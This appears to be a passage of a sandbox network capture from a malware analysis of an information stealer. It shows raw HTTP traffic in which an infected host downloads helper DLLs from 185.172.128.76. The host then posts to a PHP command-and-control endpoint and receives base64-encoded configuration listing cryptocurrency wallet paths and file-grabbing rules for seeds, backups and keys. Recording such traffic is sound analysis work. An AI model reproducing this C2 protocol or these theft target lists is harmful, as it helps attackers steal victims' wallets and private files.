                                                                                                                                                                                                                            Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
                                                                                                                                                                                                                            Apr 25, 2024 09:04:14.240869999 CEST94OUTGET /15f649199f40275b/softokn3.dll HTTP/1.1
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Apr 25, 2024 09:04:14.554730892 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Thu, 25 Apr 2024 07:04:14 GMT
                                                                                                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                                                                                                            Content-Length: 257872
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                            ETag: "3ef50-5e7e950876500"
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data|@.00cfg@@.rsrc@@.reloc56@B
                                                                                                                                                                                                                            Apr 25, 2024 09:04:14.809254885 CEST98OUTGET /15f649199f40275b/vcruntime140.dll HTTP/1.1
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Apr 25, 2024 09:04:15.128218889 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Thu, 25 Apr 2024 07:04:15 GMT
                                                                                                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                                                                                                            Content-Length: 80880
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                            ETag: "13bf0-5e7e950876500"
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
                                                                                                                                                                                                                            Apr 25, 2024 09:04:15.979199886 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----CFCBFHJECAKEHIECGIEB
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Content-Length: 1067
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Apr 25, 2024 09:04:16.319063902 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Thu, 25 Apr 2024 07:04:16 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Apr 25, 2024 09:04:16.432490110 CEST468OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----KJDHCAFCGDAAKEBFIJDG
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Content-Length: 267
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 44 48 43 41 46 43 47 44 41 41 4b 45 42 46 49 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 32 35 37 39 32 30 33 36 65 38 36 38 61 33 38 33 37 61 62 33 64 30 65 35 38 30 38 32 38 34 32 61 38 37 39 66 34 63 36 31 61 36 33 39 63 31 65 63 35 66 64 66 34 31 37 38 66 61 36 34 38 64 66 37 39 37 35 34 39 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 48 43 41 46 43 47 44 41 41 4b 45 42 46 49 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 48 43 41 46 43 47 44 41 41 4b 45 42 46 49 4a 44 47 2d 2d 0d 0a
                                                                                                                                                                                                                            Data Ascii: ------KJDHCAFCGDAAKEBFIJDGContent-Disposition: form-data; name="token"1c25792036e868a3837ab3d0e58082842a879f4c61a639c1ec5fdf4178fa648df7975496------KJDHCAFCGDAAKEBFIJDGContent-Disposition: form-data; name="message"wallets------KJDHCAFCGDAAKEBFIJDG--
                                                                                                                                                                                                                            Apr 25, 2024 09:04:16.752981901 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Thu, 25 Apr 2024 07:04:16 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 2408
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 58 45 64 79 5a 57 56 75 58 48 64 68 62 47 78 6c 64 48 4e 63 66 43 6f 75 4b 6e 77 78 66 46 64 68 63 32 46 69 61 53 42 58 59 57 78 73 5a 58 52 38 4d 58 78 63 56 32 46 73 62 47 56 30 56 32 46 7a 59 57 4a 70 58 45 4e 73 61 57 56 75 64 46 78 58 59 57 78 73 5a 58 52 7a 58 48 77 71 4c 6d 70 7a 62 32 35 38 4d 48 78 46 64 47 68 6c 63 6d 56 31 62 58 77 78 66 46 78 46 64 47 68 6c 63 6d 56 31 62 56 78 38 61 32 56 35 63 33 52 76 63 6d 56 38 4d 48 78 46 62 47 56 6a 64 48 4a 31 62 58 77 78 66 46 78 46 62 47 56 6a 64 48 4a 31 62 56 78 33 59 57 78 73 5a 58 52 7a 58 48 77 71 4c 69 70 38 4d 48 78 46 62 47 56 6a 64 48 4a 31 62 55 78 55 51 33 77 78 66 46 78 46 62 47 56 6a 64 48 4a 31 62 53 31 4d 56 45 4e 63 64 32 46 73 62 47 56 30 63 31 78 38 4b 69 34 71 66 44 42 38 52 58 68 76 5a 48 56 7a 66 44 46 38 58 45 56 34 62 32 52 31 63 31 78 38 5a 58 68 76 5a 48 56 7a 4c 6d 4e 76 62 6d 59 75 61 6e 4e 76 62 6e 77 77 66 45 56 34 62 32 52 31 63 33 77 78 66 46 78 46 65 47 39 6b 64 58 4e 63 66 48 64 70 62 6d 52 76 64 79 31 7a 64 47 46 30 5a 53 35 71 63 32 39 75 66 44 42 38 52 58 68 76 5a 48 56 7a 58 47 56 34 62 32 52 31 63 79 35 33 59 57 78 73 5a 58 52 38 4d 58 78 63 52 58 68 76 5a 48 56 7a 58 47 56 34 62 32 52 31 63 79 35 33 59 57 78 73 5a 58 52 63 66 48 42 68 63 33 4e 77 61 48 4a 68 63 32 55 75 61 6e 4e 76 62 6e 77 77 66 45 56 34 62 32 52 31 63 31 78 6c 65 47 39 6b 64 58 4d 75 64 32 46 73 62 47 56 30 66 44 46 38 58 45 56 34 62 32 52 31 63 31 78 6c 65 47 39 6b 64 58 4d 75 64 32 46 73 62 47 56 30 58 48 78 7a 5a 57 56 6b 4c 6e 4e 6c 59 32 39 38 4d 48 78 46 65 47 39 6b 64 58 4e 63 5a 58 68 76 5a 48 56 7a 4c 6e 64 68 62 47 78 6c 64 48 77 78 66 46 78 46 65 47 39 6b 64 58 4e 63 5a 58 68 76 5a 48 56 7a 4c 6e 64 68 62 47 78 6c 64 46 78 38 61 57 35 6d 62 79 35 7a 5a 57 4e 76 66 44 42 38 52 57 78 6c 59 33 52 79 62 32 34 67 51 32 46 7a 61 48 77 78 66 46 78 46 62 47 56 6a 64 48 4a 76 62 6b 4e 68 63 32 68 63 64 32 46 73 62 47 56 30 63 31 78 38 4b 69 34 71 66 44 42 38 54 58 56 73 64 47 6c 45 62 32 64 6c 66 44 46 38 58 45 31 31 62 48 52 70 52 47 39 6e 5a 56 78 38 62 58 56 73 64 47 6c 6b 62 32 64 6c 4c 6e 64 68 62 47 78 6c 64 48 77 77 66 45 70 68 65 48 67 67 52 47 56 7a 61 33 52 76 63 43 41 6f 62 32 78 6b 4b 58 77 78 66 46 78 71 59 58 68 34 58 45 78 76 59 32 46 73 49
                                                                                                                                                                                                                            Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8XE11bHRpRG9nZVx8bXVsdGlkb2dlLndhbGxldHwwfEpheHggRGVza3RvcCAob2xkKXwxfFxqYXh4XExvY2FsI
                                                                                                                                                                                                                            Apr 25, 2024 09:04:16.755933046 CEST466OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----AFCFHJJECAEHJJKEHIDB
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Content-Length: 265
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 41 46 43 46 48 4a 4a 45 43 41 45 48 4a 4a 4b 45 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 32 35 37 39 32 30 33 36 65 38 36 38 61 33 38 33 37 61 62 33 64 30 65 35 38 30 38 32 38 34 32 61 38 37 39 66 34 63 36 31 61 36 33 39 63 31 65 63 35 66 64 66 34 31 37 38 66 61 36 34 38 64 66 37 39 37 35 34 39 36 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 46 48 4a 4a 45 43 41 45 48 4a 4a 4b 45 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 46 48 4a 4a 45 43 41 45 48 4a 4a 4b 45 48 49 44 42 2d 2d 0d 0a
                                                                                                                                                                                                                            Data Ascii: ------AFCFHJJECAEHJJKEHIDBContent-Disposition: form-data; name="token"1c25792036e868a3837ab3d0e58082842a879f4c61a639c1ec5fdf4178fa648df7975496------AFCFHJJECAEHJJKEHIDBContent-Disposition: form-data; name="message"files------AFCFHJJECAEHJJKEHIDB--
                                                                                                                                                                                                                            Apr 25, 2024 09:04:17.071533918 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Thu, 25 Apr 2024 07:04:16 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 2052
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Data Raw: 52 45 56 54 53 33 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 6f 75 64 48 68 30 4c 43 6f 75 5a 47 39 6a 65 43 77 71 4c 6e 68 73 63 33 68 38 4e 58 77 78 66 44 46 38 52 45 56 54 53 33 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6e 42 75 5a 79 77 71 64 32 46 73 62 47 56 30 4b 69 35 77 5a 47 59 73 4b 6d 4a 68 59 32 74 31 63 43 6f 75 63 47 35 6e 4c 43 70 69 59 57 4e 72 64 58 41 71 4c 6e 42 6b 5a 69 77 71 63 6d 56 6a 62 33 5a 6c 63 69 6f 75 63 47 35 6e 4c 43 70 79 5a 57 4e 76 64 6d 56 79 4b 69 35 77 5a 47 59 73 4b 6d 31 6c 64 47 46 74 59 58 4e 72 4b 69 34 71 4c 43 70 56 56 45 4d 74 4c 53 6f 75 4b 6e 77 78 4e 54 41 77 66 44 46 38 4d 58 78 45 54 30 4e 54 66 43 56 45 54 30 4e 56 54 55 56 4f 56 46 4d 6c 58 48 77 71 64 32 46 73 62 47 56 30 4b 69 35 77 62 6d 63 73 4b 6e 64 68 62 47 78 6c 64 43 6f 75 63 47 52 6d 4c 43 70 69 59 57 4e 72 64 58 41 71 4c 6e 42 75 5a 79 77 71 59 6d 46 6a 61 33 56 77 4b 69 35 77 5a 47 59 73 4b 6e 4a 6c 59 32 39 32 5a 58 49 71 4c 6e 42 75 5a 79 77 71 63 6d 56 6a 62 33 5a 6c 63 69 6f 75 63 47 52 6d 4c 43 70 74 5a 58 52 68 62 57 46 7a 61 79 6f 75 4b 69 77 71 56 56 52 44 4c 53 30 71 4c 69 70 38 4d 54 55 77 4d 48 77 78 66 44 46 38 52 45 39 44 55 33 77 6c 52 45 39 44 56 55 31 46 54 6c 52 54 4a 56 78 38 4b 69 35 